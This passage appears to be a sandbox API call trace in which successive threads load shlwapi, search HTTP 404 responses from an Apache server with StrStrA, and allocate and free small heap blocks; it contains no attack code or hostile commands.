(lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.744] GetProcessHeap () returned 0x690000 [0286.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0286.744] GetProcessHeap () returned 0x690000 [0286.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0286.744] GetProcessHeap () returned 0x690000 [0286.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 446 os_tid = 0x176c [0286.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.939] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.939] GetProcessHeap () returned 0x690000 [0286.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0286.939] GetProcessHeap () returned 0x690000 [0286.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0286.939] GetProcessHeap () returned 0x690000 [0286.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 447 os_tid = 0x1780 [0287.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.299] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.299] GetProcessHeap () returned 0x690000 [0287.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0287.299] GetProcessHeap () returned 0x690000 [0287.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0287.299] GetProcessHeap () returned 0x690000 [0287.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 448 os_tid = 0x178c [0287.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.539] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.539] GetProcessHeap () returned 0x690000 [0287.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0287.539] GetProcessHeap () returned 0x690000 [0287.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0287.539] GetProcessHeap () returned 0x690000 [0287.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 449 os_tid = 0x1794 [0287.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.732] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.732] GetProcessHeap () returned 0x690000 [0287.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0287.732] GetProcessHeap () returned 0x690000 [0287.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0287.732] GetProcessHeap () returned 0x690000 [0287.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 450 os_tid = 0x179c [0287.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.994] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.994] GetProcessHeap () returned 0x690000 [0287.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0287.994] GetProcessHeap () returned 0x690000 [0287.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0287.995] GetProcessHeap () returned 0x690000 [0287.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 451 os_tid = 0x17a4 [0288.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.250] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.251] GetProcessHeap () returned 0x690000 [0288.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0288.251] GetProcessHeap () returned 0x690000 [0288.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0288.251] GetProcessHeap () returned 0x690000 [0288.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 452 os_tid = 0x17a8 [0288.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.460] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.460] GetProcessHeap () returned 0x690000 [0288.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0288.460] GetProcessHeap () returned 0x690000 [0288.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0288.460] GetProcessHeap () returned 0x690000 [0288.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 453 os_tid = 0x17ac [0288.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.653] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.653] GetProcessHeap () returned 0x690000 [0288.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0288.654] GetProcessHeap () returned 0x690000 [0288.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0288.654] GetProcessHeap () returned 0x690000 [0288.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 454 os_tid = 0x17b0 [0289.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0289.013] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.013] GetProcessHeap () returned 0x690000 [0289.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0289.013] GetProcessHeap () returned 0x690000 [0289.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0289.013] GetProcessHeap () returned 0x690000 [0289.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 455 os_tid = 0x17b4 [0291.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0291.779] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.779] GetProcessHeap () returned 0x690000 [0291.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0291.779] GetProcessHeap () returned 0x690000 [0291.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0291.779] GetProcessHeap () returned 0x690000 [0291.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 456 os_tid = 0x17b8 [0292.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.103] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.103] GetProcessHeap () returned 0x690000 [0292.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0292.103] GetProcessHeap () returned 0x690000 [0292.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0292.103] GetProcessHeap () returned 0x690000 [0292.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 457 os_tid = 0x17bc [0292.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.272] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.272] GetProcessHeap () returned 0x690000 [0292.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0292.272] GetProcessHeap () returned 0x690000 [0292.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0292.272] GetProcessHeap () returned 0x690000 [0292.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 458 os_tid = 0x17c4 [0292.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.444] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.444] GetProcessHeap () returned 0x690000 [0292.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0292.444] GetProcessHeap () returned 0x690000 [0292.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0292.444] GetProcessHeap () returned 0x690000 [0292.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 459 os_tid = 0x17cc [0292.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.693] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.693] GetProcessHeap () returned 0x690000 [0292.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0292.693] GetProcessHeap () returned 0x690000 [0292.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0292.693] GetProcessHeap () returned 0x690000 [0292.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 460 os_tid = 0x17d0 [0292.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0292.904] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.904] GetProcessHeap () returned 0x690000 [0292.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0292.904] GetProcessHeap () returned 0x690000 [0292.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0292.904] GetProcessHeap () returned 0x690000 [0292.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 461 os_tid = 0x17d4 [0293.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.101] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.101] GetProcessHeap () returned 0x690000 [0293.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0293.101] GetProcessHeap () returned 0x690000 [0293.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0293.101] GetProcessHeap () returned 0x690000 [0293.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 462 os_tid = 0x17d8 [0293.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.282] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.282] GetProcessHeap () returned 0x690000 [0293.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0293.282] GetProcessHeap () returned 0x690000 [0293.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0293.282] GetProcessHeap () returned 0x690000 [0293.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 463 os_tid = 0x17e8 [0293.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.464] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.464] GetProcessHeap () returned 0x690000 [0293.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0293.464] GetProcessHeap () returned 0x690000 [0293.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0293.464] GetProcessHeap () returned 0x690000 [0293.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 464 os_tid = 0x17ec [0293.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.744] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.744] GetProcessHeap () returned 0x690000 [0293.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0293.744] GetProcessHeap () returned 0x690000 [0293.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0293.745] GetProcessHeap () returned 0x690000 [0293.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 465 os_tid = 0x17f0 [0293.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.000] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.000] GetProcessHeap () returned 0x690000 [0294.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0294.000] GetProcessHeap () returned 0x690000 [0294.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0294.000] GetProcessHeap () returned 0x690000 [0294.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 466 os_tid = 0x17f4 [0294.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.564] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.564] GetProcessHeap () returned 0x690000 [0294.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0294.579] GetProcessHeap () returned 0x690000 [0294.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0294.579] GetProcessHeap () returned 0x690000 [0294.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 467 os_tid = 0x17f8 [0294.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.989] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.989] GetProcessHeap () returned 0x690000 [0294.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0294.989] GetProcessHeap () returned 0x690000 [0294.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0294.990] GetProcessHeap () returned 0x690000 [0294.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 468 os_tid = 0x17fc [0295.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.229] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.229] GetProcessHeap () returned 0x690000 [0295.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0295.229] GetProcessHeap () returned 0x690000 [0295.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0295.230] GetProcessHeap () returned 0x690000 [0295.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 469 os_tid = 0xbec [0295.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.454] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.454] GetProcessHeap () returned 0x690000 [0295.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0295.454] GetProcessHeap () returned 0x690000 [0295.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0295.454] GetProcessHeap () returned 0x690000 [0295.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 470 os_tid = 0x5d4 [0295.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.721] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.721] GetProcessHeap () returned 0x690000 [0295.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0295.722] GetProcessHeap () returned 0x690000 [0295.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0295.722] GetProcessHeap () returned 0x690000 [0295.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 471 os_tid = 0x136c [0295.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.909] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.909] GetProcessHeap () returned 0x690000 [0295.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0295.909] GetProcessHeap () returned 0x690000 [0295.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0295.909] GetProcessHeap () returned 0x690000 [0295.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 472 os_tid = 0x1458 [0296.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.108] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.108] GetProcessHeap () returned 0x690000 [0296.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0296.108] GetProcessHeap () returned 0x690000 [0296.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0296.109] GetProcessHeap () returned 0x690000 [0296.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 473 os_tid = 0x1304 [0296.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.307] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.307] GetProcessHeap () returned 0x690000 [0296.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0296.307] GetProcessHeap () returned 0x690000 [0296.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0296.308] GetProcessHeap () returned 0x690000 [0296.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 474 os_tid = 0x1314 [0296.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.502] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.502] GetProcessHeap () returned 0x690000 [0296.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0296.502] GetProcessHeap () returned 0x690000 [0296.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0296.502] GetProcessHeap () returned 0x690000 [0296.503] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 475 os_tid = 0x1310 [0296.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.708] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.708] GetProcessHeap () returned 0x690000 [0296.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0296.711] GetProcessHeap () returned 0x690000 [0296.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0296.711] GetProcessHeap () returned 0x690000 [0296.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 476 os_tid = 0x5d8 [0296.921] 